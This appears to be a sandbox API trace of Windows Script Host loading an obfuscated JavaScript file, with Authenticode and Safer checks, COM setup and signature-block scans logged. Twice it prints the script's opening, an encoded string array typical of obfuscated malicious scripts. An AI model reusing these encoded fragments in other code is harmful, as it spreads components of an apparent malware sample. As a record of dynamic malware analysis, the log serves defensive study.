	[0067.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x110000, cbMultiByte=19304, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19304
	[0067.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x110000, cbMultiByte=19304, lpWideCharStr=0x3ef978, cchWideChar=19304 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0067.962] UnmapViewOfFile (lpBaseAddress=0x110000) returned 1
	[0067.963] CloseHandle (hObject=0x114) returned 1
	[0067.963] CloseHandle (hObject=0x110) returned 1
	[0067.963] GetSystemDirectoryA (in: lpBuffer=0x22ef98, uSize=0x0 | out: lpBuffer="\xdc\xf3\x22") returned 0x14
	[0067.963] ??2@YAPEAX_K@Z () returned 0x2b74d0
	[0067.963] GetSystemDirectoryA (in: lpBuffer=0x2b74d0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0067.963] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefd710000
	[0067.963] ??3@YAXPEAX@Z () returned 0x64fac301
	[0067.963] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferIdentifyLevel") returned 0x7fefd72e470
	[0067.963] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefd72f9b0
	[0067.963] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferCloseLevel") returned 0x7fefd72f660
	[0067.963] IdentifyCodeAuthzLevelW () returned 0x1
	[0068.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22e110 | out: lpSystemTimeAsFileTime=0x22e110*(dwLowDateTime=0xa100e550, dwHighDateTime=0x1d543d1)) 
	[0068.012] GetCurrentProcessId () returned 0x1ec
	[0068.012] GetCurrentThreadId () returned 0x478
	[0068.012] GetTickCount () returned 0x21c56
	[0068.012] QueryPerformanceCounter (in: lpPerformanceCount=0x22e118 | out: lpPerformanceCount=0x22e118*=19243861164) returned 1
	[0068.013] malloc (_Size=0x100) returned 0x2b7b60
	[0068.013] GetVersionExA (in: lpVersionInformation=0x22def0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe33af810, dwBuildNumber=0x7fe, dwPlatformId=0xe33a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x22def0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0068.013] GetUserDefaultLCID () returned 0x409
	[0068.013] IsFileSupportedName () returned 0x1
	[0068.013] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
	[0068.013] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
	[0068.013] _wcsicmp (_String1=".js", _String2=".js") returned 0
	[0068.023] GetSignedDataMsg () returned 0x0
	[0068.023] GetCurrentProcess () returned 0xffffffffffffffff
	[0068.023] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x22e750, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x22e750*=0x140) returned 1
	[0068.023] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0068.023] ??2@YAPEAX_K@Z () returned 0x2ba4f0
	[0068.023] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0068.023] ReadFile (in: hFile=0x140, lpBuffer=0x2ba4f0, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x22e730, lpOverlapped=0x0 | out: lpBuffer=0x2ba4f0*, lpNumberOfBytesRead=0x22e730*=0x4b68, lpOverlapped=0x0) returned 1
	[0068.023] CoInitialize (pvReserved=0x0) returned 0x1
	[0068.023] CoCreateInstance (in: rclsid=0x7fee33af850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x22e6a0 | out: ppv=0x22e6a0*=0x2bf4c0) returned 0x0
	[0068.027] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22c8a0 | out: lpSystemTimeAsFileTime=0x22c8a0*(dwLowDateTime=0xa10346b0, dwHighDateTime=0x1d543d1)) 
	[0068.027] GetCurrentProcessId () returned 0x1ec
	[0068.027] GetCurrentThreadId () returned 0x478
	[0068.027] GetTickCount () returned 0x21c65
	[0068.027] QueryPerformanceCounter (in: lpPerformanceCount=0x22c8a8 | out: lpPerformanceCount=0x22c8a8*=19245346888) returned 1
	[0068.028] malloc (_Size=0x100) returned 0x2b7c70
	[0068.028] __dllonexit () returned 0x7fee33614c0
	[0068.028] __dllonexit () returned 0x7fee33614e8
	[0068.028] GetVersionExA (in: lpVersionInformation=0x22c680*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xe3362dc9, dwBuildNumber=0x7fe, dwPlatformId=0xe33614e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x22c680*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0068.028] GetProcessWindowStation () returned 0x30
	[0068.028] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x22c668, nLength=0xc, lpnLengthNeeded=0x22c660 | out: pvInfo=0x22c668, lpnLengthNeeded=0x22c660) returned 1
	[0068.028] ??2@YAPEAX_K@Z () returned 0x2bf060
	[0068.028] ??2@YAPEAX_K@Z () returned 0x2bf0b0
	[0068.028] ??2@YAPEAX_K@Z () returned 0x2bf0e0
	[0068.028] ??2@YAPEAX_K@Z () returned 0x2bf120
	[0068.028] ??2@YAPEAX_K@Z () returned 0x2bf160
	[0068.028] ??2@YAPEAX_K@Z () returned 0x2bf1a0
	[0068.028] ??2@YAPEAX_K@Z () returned 0x2bf1e0
	[0068.028] ??2@YAPEAX_K@Z () returned 0x2bf220
	[0068.028] ??2@YAPEAX_K@Z () returned 0x2bf260
	[0068.028] ??2@YAPEAX_K@Z () returned 0x2bf2a0
	[0068.028] ??2@YAPEAX_K@Z () returned 0x2bf2e0
	[0068.028] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.028] ??2@YAPEAX_K@Z () returned 0x2bf330
	[0068.028] ??2@YAPEAX_K@Z () returned 0x2bf370
	[0068.028] DllGetClassObject (in: rclsid=0x3ee400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22d370 | out: ppv=0x22d370*=0x2bf0b0) returned 0x0
	[0068.028] ??2@YAPEAX_K@Z () returned 0x2bf0b0
	[0068.029] IClassFactory:CreateInstance (in: This=0x2bf0b0, pUnkOuter=0x0, riid=0x22e150*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x22d390 | out: ppvObject=0x22d390*=0x2bf4c0) returned 0x0
	[0068.029] ??2@YAPEAX_K@Z () returned 0x2bf3b0
	[0068.029] GetSystemInfo (in: lpSystemInfo=0x22d1d0 | out: lpSystemInfo=0x22d1d0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0068.029] VirtualQuery (in: lpAddress=0x22d240, lpBuffer=0x22d200, dwLength=0x30 | out: lpBuffer=0x22d200*(BaseAddress=0x22d000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0068.029] ??2@YAPEAX_K@Z () returned 0x2bf3f0
	[0068.029] ??2@YAPEAX_K@Z () returned 0x2bf410
	[0068.029] ??2@YAPEAX_K@Z () returned 0x2bf470
	[0068.029] ??2@YAPEAX_K@Z () returned 0x2bf4a0
	[0068.029] ??2@YAPEAX_K@Z () returned 0x2bf550
	[0068.030] IUnknown:AddRef (This=0x2bf4c0) returned 0x2
	[0068.030] IUnknown:Release (This=0x2bf4c0) returned 0x1
	[0068.030] IUnknown:Release (This=0x2bf0b0) returned 0x0
	[0068.030] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.030] IUnknown:QueryInterface (in: This=0x2bf4c0, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x22e5d8 | out: ppvObject=0x22e5d8*=0x2bf4c0) returned 0x0
	[0068.030] IUnknown:Release (This=0x2bf4c0) returned 0x1
	[0068.030] _strnicmp (_Str1="<?xml", _Str="var d", _MaxCount=0x5) returned -58
	[0068.030] IsTextUnicode (in: lpv=0x2ba4f0, iSize=19304, lpiResult=0x22e628 | out: lpiResult=0x22e628) returned 0
	[0068.030] GetACP () returned 0x4e4
	[0068.030] malloc (_Size=0x97d0) returned 0x4bdfd0
	[0068.031] GetACP () returned 0x4e4
	[0068.031] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ba4f0, cbMultiByte=19304, lpWideCharStr=0x4bdfd0, cchWideChar=19432 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0068.031] realloc (_Block=0x4bdfd0, _Size=0x96d0) returned 0x4bdfd0
	[0068.031] ??2@YAPEAX_K@Z () returned 0x2bf0b0
	[0068.032] free (_Block=0x4bdfd0) 
	[0068.032] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.032] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.032] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.032] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.032] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.032] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.032] CoUninitialize () 
	[0068.032] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.032] CloseHandle (hObject=0x140) returned 1
	[0068.032] wcsncmp (_String1="var dogoswoisosfhsdiefgssqda=['wq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0068.032] wcsncmp (_String1="ar dogoswoisosfhsdiefgssqda=['wqt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0068.032] wcsncmp (_String1="r dogoswoisosfhsdiefgssqda=['wqto", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0068.032] wcsncmp (_String1=" dogoswoisosfhsdiefgssqda=['wqtow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19
